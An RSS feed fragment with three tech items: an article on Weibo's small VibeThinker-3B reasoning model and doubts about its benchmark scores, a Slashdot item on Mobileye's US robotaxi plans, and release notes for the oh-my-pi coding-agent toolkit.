<content:encoded><![CDATA[<p>On Sunday, a team of nine researchers at <a href="https://weibo.com/">Sina Weibo</a> — the Chinese social media giant better known for its microblogging platform than for cutting-edge artificial intelligence — quietly posted a <a href="https://arxiv.org/pdf/2606.16140">14-page technical report</a> to arXiv that sent shockwaves through the AI research community. Their claim: a language model with just 3 billion parameters can match or exceed the reasoning performance of flagship systems from <a href="https://deepmind.google/">Google DeepMind</a>, <a href="https://openai.com/">OpenAI</a>, <a href="https://www.anthropic.com/">Anthropic</a>, and <a href="https://chat.deepseek.com/">DeepSeek</a> that are hundreds of times larger.</p><p>The model, called <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a>, scored 94.3 on <a href="https://aime26.aimedicine.info/">AIME 2026</a> — the American Invitational Mathematics Examination, one of the most demanding standardized math competitions in the world. That figure places it alongside <a href="https://api-docs.deepseek.com/news/news251201">DeepSeek V3.2</a>, a model with 671 billion parameters, and ahead of <a href="https://blog.google/products-and-platforms/products/gemini/gemini-3/">Gemini 3 Pro</a>, Google's high-performance flagship reasoning system, which scored 91.7. With a test-time scaling technique the team calls Claim-Level Reliability Assessment, the score climbs to 97.1, edging past virtually every system in the public record.</p><p>Within hours of publication, the paper had drawn 62 upvotes on <a href="https://huggingface.co/papers/2606.16140">Hugging Face's daily papers</a> feed, the model repository had accumulated 130 likes, and the <a href="https://github.com/WeiboAI/VibeThinker">GitHub repository</a> had reached 685 stars. But the reaction on social media was not uniformly celebratory. It was, in many cases, deeply skeptical.</p><p>"WHAT THE HELL is happening in AI?" wrote the user <a href="https://x.com/orcus108/status/2066876960073281582">@orcus108</a> on X, in a post that accumulated over 161,000 views. "A 3B parameter model just put up coding benchmark scores in the same league as Claude Opus 4.5… I genuinely don't know if this is a breakthrough or if the benchmarks are broken."</p><p>That tension — between genuine scientific advancement and the growing suspicion that AI benchmarks have become gameable to the point of meaninglessness — sits at the heart of the <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a> story. And the answer matters enormously, not just for academic bragging rights, but for the multibillion-dollar question of whether the AI industry's relentless push toward ever-larger models is the only path to intelligence.</p><div></div><h2><b>Benchmark scores that defy the scaling laws of modern AI</b></h2><p>The results reported in the technical report are, by any conventional standard, extraordinary.</p><p>On the mathematics side, <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a> achieved 91.4 on <a href="https://artificialanalysis.ai/evaluations/aime-2025">AIME 2025</a>, 94.3 on <a href="https://llm-stats.com/benchmarks/aime-2026">AIME 2026</a>, 89.3 on <a href="https://huggingface.co/datasets/MathArena/hmmt_feb_2025">HMMT 2025</a> (the Harvard-MIT Mathematics Tournament), 93.8 on <a href="https://huggingface.co/datasets/MathArena/brumo_2025">BruMO 2025</a> (the Brown University Math Olympiad), and 76.4 on <a href="https://huggingface.co/datasets/Hwilner/imo-answerbench">IMO-AnswerBench</a>, a benchmark comprising 400 problems at the level of the International Mathematical Olympiad. In coding, it posted an 80.2 Pass@1 on <a href="https://www.kaggle.com/benchmarks/open-benchmarks/livecodebench-release-v6">LiveCodeBench v6</a>, a benchmark designed to test executable code generation, and achieved a 96.1 percent acceptance rate on unseen <a href="https://leetcode.com/contest/">LeetCode weekly</a> and biweekly contests from late April through late May 2026. On instruction following, it scored 93.4 on <a href="https://huggingface.co/datasets/google/IFEval">IFEval</a>.</p><p>To put the parameter disparity in perspective: <a href="https://api-docs.deepseek.com/news/news251201">DeepSeek V3.2</a> has 671 billion parameters — roughly 224 times the size of <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a>. <a href="https://huggingface.co/zai-org/GLM-5">GLM-5</a>, from Zhipu AI, has 744 billion parameters. <a href="https://huggingface.co/moonshotai/Kimi-K2.5">Kimi K2.5</a>, from Moonshot AI, exceeds 1 trillion. VibeThinker-3B's 3 billion parameters could run on a consumer laptop.</p><p>The researchers frame this result not as an anomaly but as evidence for a broader theoretical claim. They introduce what they call the "<a href="https://arxiv.org/pdf/2606.16140">Parametric Compression-Coverage Hypothesis</a>," which argues that different types of AI capability have fundamentally different relationships to model size. Verifiable reasoning — the kind tested by math competitions and coding challenges, where answers can be definitively checked — is what the paper calls a "parameter-dense" capability: one that can be compressed into a compact core. Open-domain knowledge, by contrast, is "parameter-expansive," requiring broad coverage across facts, concepts, and edge cases that inherently demands more parameters.</p><p>The paper acknowledges this distinction directly. On <a href="https://epoch.ai/benchmarks/gpqa-diamond">GPQA-Diamond</a>, a graduate-level science knowledge benchmark, VibeThinker-3B scored just 70.2 — well behind the 91.9 achieved by Gemini 3 Pro and the 87.0 scored by Claude Opus 4.5. The authors write that this gap "is consistent with our claim rather than a contradiction to it: the main finding is not that a 3B model has fully replaced leading general-purpose models, but that a small model can reach first-tier performance on many verifiable reasoning tasks."</p><div></div><h2><b>Inside the four-stage training pipeline that powers a tiny reasoning engine</b></h2><p><a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a> is not built from scratch. It is post-trained on top of <a href="https://huggingface.co/Qwen/Qwen2.5-Coder-3B">Qwen2.5-Coder-3B</a>, a compact foundation model from Alibaba's Qwen team, through what the Weibo AI researchers call the "Spectrum-to-Signal Principle" — a multi-stage pipeline first introduced in the team's earlier VibeThinker-1.5B work in November 2025.</p><p>The training unfolds in four major phases. The first is a two-stage supervised fine-tuning process that uses curriculum learning: the model first trains on a broad mixture of math, code, STEM reasoning, general dialogue, and instruction-following data, then shifts to a curated subset of harder, longer-horizon reasoning problems. In the second stage, samples with reasoning traces shorter than 5,000 tokens are discarded, and problems that <a href="https://huggingface.co/WeiboAI/VibeThinker-1.5B">VibeThinker-1.5B</a> can solve more than 75 percent of the time are filtered out, forcing the model to focus on genuinely difficult challenges.</p><p>The second phase applies reinforcement learning across multiple domains — mathematics, code, and STEM — using the team's <a href="https://www.emergentmind.com/topics/maxent-guided-policy-optimization-mgpo">MaxEnt-Guided Policy Optimization</a> algorithm, or MGPO, which prioritizes training on problems at the model's current capability boundary rather than problems it already solves easily or finds impossible. Notably, the team found that a strategy that worked well at the 1.5B scale — progressively expanding the context window during RL training — actually hurt performance at 3B. They hypothesize that the stronger starting checkpoint meant that truncating reasoning traces during warm-up was no longer removing noise but disrupting valid reasoning patterns. The solution was to train with a single 64,000-token context window throughout.</p><p>Within the math RL phase, the team also introduces what it calls "<a href="https://arxiv.org/pdf/2606.16140">Long2Short Math RL</a>," a secondary optimization stage that redistributes rewards to favor shorter correct solutions over longer ones, reducing verbosity without sacrificing accuracy. The technique uses a zero-sum reward redistribution that avoids biasing the overall reward signal while nudging the model toward more efficient reasoning.</p><p>The third phase extracts high-quality reasoning trajectories from the RL-trained checkpoints and distills them back into a unified model through supervised fine-tuning. The team uses a "learning-potential score" — essentially the student model's perplexity on each teacher trajectory — to prioritize traces that are correct but that the student has not yet internalized. The final phase, called Instruct RL, applies reinforcement learning on instruction-following tasks using a combination of rule-based validators for format constraints and rubric-based reward models for open-ended quality assessment.</p><p><a href="https://x.com/f14bertolotti/status/2066752828505288902">Francesco Bertolotti</a>, an AI researcher who flagged the paper early on X, described the approach succinctly: "These results were achieved primarily through post-training refinements on Qwen2.5-Coder. The paper doesn't provide many details, but it appears they distill from RL ckpts and then do a final RL-based instruct RL." His post drew over 161,000 views.</p><div></div><h2><b>Real-world testing reveals the gap between benchmark scores and practical AI performance</b></h2><p>For every enthusiastic reaction, the paper drew an equally forceful objection. The AI research community in mid-2026 has grown deeply wary of benchmark-driven claims, and <a href="https://github.com/WeiboAI/VibeThinker">VibeThinker-3B</a> arrived in an environment primed for suspicion.</p><p>"The benchmarks are literal pattern matching single file coding," wrote <a href="https://x.com/BigMoonKR/status/2066950583941214698">@BigMoonKR</a> on X. "It has no relation to actual coding work. I don't know how people still don't get this."</p><p>"Benchmaxxing," declared @<a href="https://x.com/oflu_bedirhan/status/2066883558388404717">oflu_bedirhan</a>, using a term that has become shorthand in the AI community for models that appear optimized specifically for benchmark performance at the expense of real-world utility.</p><p>The most pointed criticism came from users who actually downloaded and tested the model. "Just tried the full precision," wrote <a href="https://x.com/politilols/status/2066901234091438132">@politilols</a>. "It doesn't even know what a uv script (so the most popular Python dev tool) is. Haven't seen that in a single LLM in at least a year now. Benchmaxxed." When Bertolotti responded that the model seemed more focused on mathematical reasoning than practical coding, the user countered: "They include a livecodebench score. Zero chance that is reflective of the model."</p><p><a href="https://x.com/Itsdotdev/status/2066961630521385166">@Itsdotdev</a> raised a structural criticism: "Look into the benchmarks themselves and it probably won't be so shocking. Why no DeepSWE? Why none of the standard benchmarks SOTA providers use?" The user @AvenirReym posed a more diagnostic question: "If it holds on a benchmark made after the model's training cutoff, it's real. If it only wins on AIME-style sets that have been circulating for years, it's leakage."</p><p>The paper's authors appear to have anticipated these objections. The technical report states that training sets "have undergone strict benchmark decontamination," including n-gram-based filtering to remove "n-gram overlaps with evaluation sets."</p><p>The LeetCode contest evaluation — which covers contests from April 25 to May 31, 2026, dates that postdate any plausible training data cutoff — represents the most robust guard against data contamination concerns. On those contests, VibeThinker-3B passed 123 out of 128 first-attempt submissions, a 96.1 percent rate that exceeded GPT-5.2, Doubao Seed 2.0 Pro, Kimi K2.5, and Claude Opus 4.6 under identical evaluation conditions.</p><p>Still, real-world user reports suggest a significant gap between benchmark performance and practical utility — a phenomenon that has become familiar across the industry. "In LM Studio it only responds well to first question, next questions reply to the first question," reported <a href="https://x.com/luismolinaab/status/2066980744220528940">@luismolinaab</a>.</p><div></div><h2><b>Why a social media company may have found a crack in the scaling hypothesis</b></h2><p>Even the sharpest critics acknowledged that achieving these benchmark numbers at 3 billion parameters — regardless of how transferable they are to production use cases — is a meaningful engineering achievement. "Even if it's benchmaxxing doing so with 3B parameters is fascinating, goes to show how fast this field is progressing," wrote <a href="https://x.com/rohityin/status/2066913806287327302">@rohityin.</a></p><p>The observation cuts to a question that has consumed the AI industry since the advent of the scaling hypothesis: Is bigger always better? The conventional wisdom, articulated most famously in the Chinchilla scaling laws and reinforced by the commercial dominance of ever-larger foundation models, holds that more parameters and more training data reliably yield better performance. The economic corollary is stark: training and deploying frontier models costs tens or hundreds of millions of dollars, creating enormous barriers to entry.</p><p><a href="https://huggingface.co/WeiboAI/VibeThinker-3B">VibeThinker-3B</a> challenges that consensus — but only partially. The paper is careful to draw a boundary around its claims, distinguishing between tasks with "clear verification signals" and those that require broad factual knowledge. The Parametric Compression-Coverage Hypothesis explicitly argues that small models cannot replace large ones across the board.</p><p>"The true significance of VibeThinker-3B does not lie in proving that a 3B model can replace large-scale generalists," the paper states, "but rather in providing a concrete empirical signal: the development of compact models is no longer merely a passive compromise for deployment efficiency or cost control; it emerges as a promising research trajectory that is fundamentally complementary to the traditional parameter scaling paradigm."</p><p>Perhaps the most surprising element of the work is its provenance. Sina Weibo — publicly traded on Nasdaq and Hong Kong, with a market capitalization that fluctuates in the single-digit billions — is not a company typically associated with frontier AI research. Yet the VibeThinker series is Weibo's second major open-source AI contribution in seven months. </p><p><a href="https://huggingface.co/WeiboAI/VibeThinker-1.5B">VibeThinker-1.5B</a>, released in November 2025, demonstrated that a model with just 1.5 billion parameters could outperform the original DeepSeek R1 on several math benchmarks — a result the team achieved for what it claimed was a post-training cost of just $7,800, compared to the $294,000 estimated for DeepSeek R1.</p><p>The research team is compact — nine authors, all listed as Sina Weibo Inc. employees. The model is released under the <a href="https://opensource.org/license/mit">MIT License</a>, one of the most permissive open-source licenses available, and the weights are freely downloadable from both <a href="https://huggingface.co/WeiboAI/VibeThinker-3B">Hugging Face</a> and <a href="https://modelscope.cn/models/WeiboAI/VibeThinker-3B">ModelScope</a>. Within the first day of release, community members had already created GGUF quantizations and derivative models.</p><h2><b>Small models, big implications, and the question the AI industry can no longer avoid</b></h2><p>The most honest assessment of <a href="https://huggingface.co/WeiboAI/VibeThinker-3B">VibeThinker-3B</a> may be that it is simultaneously less and more than what the benchmarks suggest. Less, because a model that struggles with basic knowledge of popular developer tools is unlikely to replace any production-grade coding assistant anytime soon. More, because the underlying insight — that reasoning ability and factual knowledge are partially decoupled, and that the former can be compressed far more aggressively than previously assumed — has profound implications for how the industry thinks about model design, deployment economics, and the accessibility of advanced AI capabilities.</p><div></div><p>If the <a href="https://arxiv.org/pdf/2606.16140">Parametric Compression-Coverage Hypothesis</a> holds, it suggests a future in which small, specialized reasoning engines operate alongside large knowledge-rich models in hybrid architectures — a vision where a 3-billion-parameter model handles the logical heavy lifting while a larger system supplies the factual grounding. Such an architecture could dramatically reduce the cost of deploying AI reasoning capabilities, potentially bringing competition-level mathematical and coding performance to devices with modest hardware.</p><p>"The interesting part is that we're starting to separate knowledge from reasoning," wrote <a href="https://x.com/RealLambdaFlux/status/2066924260724265463">@RealLambdaFlux</a> on X. "A small model with strong post-training can punch way above its size on tasks with clear feedback."</p><p><a href="https://x.com/cmitsakis/status/2066850007693578352">@cmitsakis</a> suggested the practical endgame: "I think small models are the future for agents because they can use tools to get the knowledge and they can run fast and cheap."</p><p>Whether that future arrives through <a href="https://huggingface.co/WeiboAI/VibeThinker-3B">VibeThinker-3B</a> specifically, or through the dozens of teams now racing to reproduce and extend these results, the paper has already accomplished something that no benchmark score can fully capture.</p><p>It has forced the AI community to confront an uncomfortable possibility: that for years, the industry may have been spending billions of dollars scaling up parameters to improve a kind of intelligence that could have fit, all along, on a laptop. The weights are public. The code is open. And the most important test isn't on any leaderboard — it's whether anyone can make a model this small actually useful in the real world.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mobileye Is Entering the US Robotaxi Market With Standalone Service]]></title>
<description><![CDATA[An anonymous reader quotes a report from Ars Technica: The driving technology company Mobileye plans to launch a robotaxi service in an as-yet-unnamed US city in 2027, it said earlier today. The service will be vertically integrated, using Mobileye's Moovit mobility platform to interact with cust...]]></description>
<link>https://tsecurity.de/de/3603058/it-security-nachrichten/mobileye-is-entering-the-us-robotaxi-market-with-standalone-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603058/it-security-nachrichten/mobileye-is-entering-the-us-robotaxi-market-with-standalone-service/</guid>
<pubDate>Tue, 16 Jun 2026 22:08:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from Ars Technica: The driving technology company Mobileye plans to launch a robotaxi service in an as-yet-unnamed US city in 2027, it said earlier today. The service will be vertically integrated, using Mobileye's Moovit mobility platform to interact with customers booking rides, coordinate drivers, and so on. The Israeli company, which was bought by Intel in 2017 before going public again in 2022, says it will start with around 100 robotaxis early next year. The company first rose to prominence in the mid-2010s, when Tesla began using Mobileye's advanced driving assistance systems (ADAS) as part of Autopilot. That relationship lasted until 2016, when Mobileye dropped Tesla as a customer after being alarmed that a driver assistance system was being sold to end users as driverless technology. Since then, Mobileye has continued to work with other partners on ADAS and autonomous vehicles.
 
It has developed a new "SuperVision" ADAS that combines cameras and radar sensors, used by Porsche and Polestar, among others. On the robotaxi front, it has partnered with Volkswagen Group's MOIA to develop a commercially available robotaxi based on the VW ID. Buzz minivan, and last year, Mobileye revealed plans to work with Lyft to deploy robotaxis in Dallas, "as soon as" this year. [...] If Mobileye's experience with the initial 100 robotaxis goes well, it says it will scale up to around 17,000 robotaxis within the following five years. "The robotaxi revolution has only just begun, and its potential for transforming how we travel around the world continues to increase," Shashua said. "This initiative is not a replacement for our existing partnerships; it is an extension of them," said Amnon Shashua, founder and CEO of Mobileye. "We remain deeply committed to enabling automakers and mobility providers with Mobileye Drive. At the same time, operating our own service allows us to accelerate adoption, gain direct operational experience, and showcase the full potential of autonomous mobility."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Mobileye+Is+Entering+the+US+Robotaxi+Market+With+Standalone+Service%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F06%2F16%2F1757207%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F06%2F16%2F1757207%2Fmobileye-is-entering-the-us-robotaxi-market-with-standalone-service%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/06/16/1757207/mobileye-is-entering-the-us-robotaxi-market-with-standalone-service?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v16.0.2]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Added

Added UMANS_WEBSEARCH_PROVIDER=native|exa support for routing Umans gateway-owned web search requests.

Fixed

A single MCP tool whose input schema can't be emitted as a valid strict tool schema for the active provider no longer fails the whole turn with HTTP 400. convertTo...]]></description>
<link>https://tsecurity.de/de/3602045/tools/v1602/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3602045/tools/v1602/</guid>
<pubDate>Tue, 16 Jun 2026 15:54:19 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Added <code>UMANS_WEBSEARCH_PROVIDER=native|exa</code> support for routing Umans gateway-owned web search requests.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>A single MCP tool whose input schema can't be emitted as a valid strict tool schema for the active provider no longer fails the whole turn with HTTP 400. <code>convertTools</code> (openai-responses) now validates each tool's emitted parameter schema for <code>enum</code>/<code>const</code>-vs-<code>type</code> contradictions that pass structural JSON-Schema validation but the provider rejects — e.g. a non-null <code>enum</code> on a <code>type: "null"</code> node, or an <code>enum</code> on an <code>array</code> node — and quarantines just the offending tool with a <code>logger.warn</code> naming the tool and schema path, keeping every other tool usable. Adds <code>findStrictToolSchemaViolation</code> to <code>@oh-my-pi/pi-ai/utils/schema</code> (<a href="https://github.com/can1357/oh-my-pi/issues/2652" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2652/hovercard">#2652</a>)</li>
<li>Fixed OpenAI Responses-compatible streams from Ollama/local hosts dropping arguments for parallel tool calls whose deltas use <code>fc_&lt;call_id&gt;</code> item ids, which left earlier <code>ast_grep</code> calls with <code>{}</code> and failed validation. (<a href="https://github.com/can1357/oh-my-pi/issues/2715" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2715/hovercard">#2715</a>)</li>
<li>Fixed dialect transcript rendering so literal thinking envelopes are unwrapped before adding the dialect's own thinking tags, preventing nested <code>&lt;thinking&gt;</code> output in advisor raw dumps (<a href="https://github.com/can1357/oh-my-pi/issues/2700" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2700/hovercard">#2700</a>).</li>
<li>Fixed Anthropic-compatible Umans requests escaping client tool names and forwarding gateway web search headers so Kimi answers normally instead of returning raw gateway search results.</li>
<li>Fixed Google Gemini tool calls with <code>toolChoice: "auto"</code> serializing an explicit <code>toolConfig</code> AUTO mode, which can cause Gemini-3 models to leak raw planning JSON instead of executing tools. (<a href="https://github.com/can1357/oh-my-pi/issues/2776" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2776/hovercard">#2776</a>)</li>
<li>Fixed OpenAI-compatible Ollama completions that return empty <code>finish_reason:length</code> after filling <code>num_ctx</code> so they surface an actionable context-window error instead of an empty length stop. (<a href="https://github.com/can1357/oh-my-pi/issues/2774" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2774/hovercard">#2774</a>)</li>
<li>Fixed Codex browser login issuing credentials for the <code>opencode</code> OAuth originator while OMP requests identify as <code>pi</code>, which could make the first authenticated Codex request return 401 (<a href="https://github.com/can1357/oh-my-pi/issues/2696" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2696/hovercard">#2696</a>).</li>
</ul>
<h2>@oh-my-pi/pi-catalog</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed Kimi output caps for Umans AI Coding Plan and Venice so discovery metadata cannot use context-sized token ceilings as request caps.</li>
<li>Marked Umans Anthropic-compatible models as client-tool escaped so cached and bundled metadata do not expose <code>web_search</code> as a provider server tool.</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Added</h3>
<ul>
<li>Added the <code>UMANS_WEBSEARCH_PROVIDER</code> environment variable to CLI help for Umans gateway web search backend selection.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>The eager <code>task</code> (<code>task.eager: always</code>) and eager <code>todo</code> (<code>todo.eager: preferred</code>/<code>always</code>) hidden reminders now re-fire on the auto-continuation turn after a compaction (context-full / snapcompact / handoff / shake). Compaction summarizes away the first-message prelude, so the agent would otherwise silently lose the delegate-via-tasks / phased-todo guidance mid-work; the post-compaction todo nudge is reminder-only and never forces the <code>todo</code> tool onto the resumed turn.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed edit-tool block operations on Emacs Lisp files: <code>.el</code> and <code>.emacs</code> paths now resolve top-level forms for <code>SWAP.BLK</code>, <code>DEL.BLK</code>, and <code>INS.BLK.POST</code> instead of reporting an unsupported-language block-resolution error.</li>
<li>Fixed PDF reads leaking recoverable MuPDF WASM warnings into the terminal TUI by routing MuPDF output through the file logger before <code>markit-ai</code> loads it (<a href="https://github.com/can1357/oh-my-pi/issues/2766" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2766/hovercard">#2766</a>).</li>
<li>Fixed <code>/exit</code> and <code>/quit</code> waiting one shutdown timeout per hanging extension by running <code>session_shutdown</code> handlers within a shared shutdown window (<a href="https://github.com/can1357/oh-my-pi/issues/2736" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2736/hovercard">#2736</a>).</li>
<li>Fixed GitHub Copilot <code>.github/instructions/*.instructions.md</code> discovery by loading those files as rules that honor <code>applyTo</code> scoping, including always-apply <code>**</code> files and <code>rule://&lt;name&gt;</code> access for glob-scoped entries (<a href="https://github.com/can1357/oh-my-pi/issues/2731" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2731/hovercard">#2731</a>).</li>
<li>Fixed Windows bash-tool child processes defaulting interpreter pipe I/O to the ANSI codepage by adding UTF-8 encoding defaults when the inherited environment is unset (<a href="https://github.com/can1357/oh-my-pi/issues/2701" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2701/hovercard">#2701</a>).</li>
<li>Fixed <code>/advisor dump raw</code> so Opus 4.5 thinking content that already includes literal <code>&lt;thinking&gt;</code> tags is not rendered with nested thinking tags (<a href="https://github.com/can1357/oh-my-pi/issues/2700" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2700/hovercard">#2700</a>).</li>
<li>The <code>plugin-extensions-discovery</code> test suite no longer writes fixtures into — and <code>rm -rf</code>s the <code>node_modules</code> of — the developer's real <code>~/.omp/plugins</code>. Its <code>XDG_DATA_HOME</code> isolation was a no-op on Windows (XDG is gated to Linux/macOS) and was bypassed in XDG-migrated Linux/macOS environments, so a local run could delete installed plugins. The suite now isolates the whole config root via an <code>os.homedir()</code> mock plus cleared <code>XDG_*</code> vars, with a pre-write guard that fails if resolution escapes the temp home (<a href="https://github.com/can1357/oh-my-pi/issues/2721" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2721/hovercard">#2721</a>).</li>
<li>Installed plugins whose <code>extensions</code> manifest entry points at a directory of sub-extensions (the standard pi <code>extensions/&lt;name&gt;/index.ts</code> layout, e.g. <code>pi.extensions: ["./extensions"]</code>) are no longer rejected at install (<code>declared extension entry not found on disk</code>) or silently dropped at load. The plugin manifest resolver now resolves a directory the same way as the configured-directory (<code>-e</code>) extension loader: the directory's own <code>package.json</code> <code>omp</code>/<code>pi</code> <code>extensions</code> (authoritative — a missing declared entry is reported instead of falling back to a decoy <code>index</code>), then a direct <code>index.{ts,js,mjs,cjs}</code>, then a one-level scan of sub-extensions (<a href="https://github.com/can1357/oh-my-pi/issues/2713" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2713/hovercard">#2713</a>).</li>
<li>Fixed OpenRouter <code>@upstream</code> routing selectors whose upstream slug also appears in the model id, so <code>openrouter/...@deepseek:high</code> keeps <code>openRouterRouting.only</code> instead of being consumed by provider-scoped fuzzy matching (<a href="https://github.com/can1357/oh-my-pi/issues/2708" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2708/hovercard">#2708</a>).</li>
<li>Fixed <code>omp plugin list --json</code> omitting locally linked plugins that exist only in <code>omp-plugins.lock.json</code> and <code>node_modules</code> symlinks. (<a href="https://github.com/can1357/oh-my-pi/issues/2742" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2742/hovercard">#2742</a>)</li>
<li>Fixed task subagents to install their configured ordered model candidates as child-session retry fallback chains, so retryable provider failures can advance to the next subagent model instead of failing the worker (<a href="https://github.com/can1357/oh-my-pi/issues/2750" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2750/hovercard">#2750</a>).</li>
<li>Fixed empty reasonless aborted assistant turns to auto-retry without switching model fallback, so transient provider-side aborts after tool results do not end headless sessions (<a href="https://github.com/can1357/oh-my-pi/issues/2685" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2685/hovercard">#2685</a>).</li>
</ul>
<h2>@oh-my-pi/hashline</h2>
<h3>Fixed</h3>
<ul>
<li>Auto-repaired duplicated JSX/XML closing boundary lines at the end of single-line replacement expansions. (<a href="https://github.com/can1357/oh-my-pi/issues/2705" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2705/hovercard">#2705</a>)</li>
</ul>
<h2>@oh-my-pi/pi-natives</h2>
<h3>Added</h3>
<ul>
<li>Added Emacs Lisp (<code>.el</code>, <code>.emacs</code>, <code>emacs-lisp</code>/<code>elisp</code>) support to native tree-sitter language inference, enabling astGrep/astEdit, summarizeCode, and blockRangeAt on Emacs Lisp source.</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed VS Code integrated terminal keypad digit CSI-u input being handled as navigation instead of text.</li>
<li>Fixed xterm-compatible terminals scrolling the native viewport to the bottom on prompt-editor keypresses by disabling <code>?1010</code>/<code>?1011</code> while the TUI owns the TTY and restoring the prior set modes on exit (<a href="https://github.com/can1357/oh-my-pi/issues/2732" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2732/hovercard">#2732</a>).</li>
<li>Fixed CMUX sessions being treated as direct terminals during resize/reset because they do not set <code>TMUX</code>/<code>STY</code>/<code>ZELLIJ</code> and may run with <code>TERM=dumb</code>; the renderer now treats CMUX workspace/surface env markers as multiplexer signals and preserves pane scrollback instead of emitting ED3 (<code>CSI 3 J</code>).</li>
<li>Fixed a self-sustaining resize-redraw storm in Warp: the non-multiplexer resize fast path borrows the alternate screen, and Warp re-reports a one-row-different size whenever the alt buffer is toggled, so each drag frame fed back a fresh resize event and the TUI flooded ED3 full repaints with stable geometry. Resize now repaints in place (no alt-screen borrow, no ED3 rewrap) on terminals that re-report size on alt-screen toggles, matching the multiplexer path. Overridable with <code>PI_TUI_RESIZE_IN_PLACE=1|0</code>.</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(ai): route prefixed Responses tool deltas by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4669710676" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2719" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2719/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2719">#2719</a></li>
<li>test(plugins): isolate discovery test from real ~/.omp on all platforms by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AsafMah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AsafMah">@AsafMah</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4669729057" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2722" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2722/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2722">#2722</a></li>
<li>fix(coding-agent): load GitHub Copilot instruction rules by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4670507607" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2734" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2734/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2734">#2734</a></li>
<li>fix(tui): stop Warp resize feedback-loop redraw storm by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sorphwer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sorphwer">@sorphwer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4671065904" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2741" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2741/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2741">#2741</a></li>
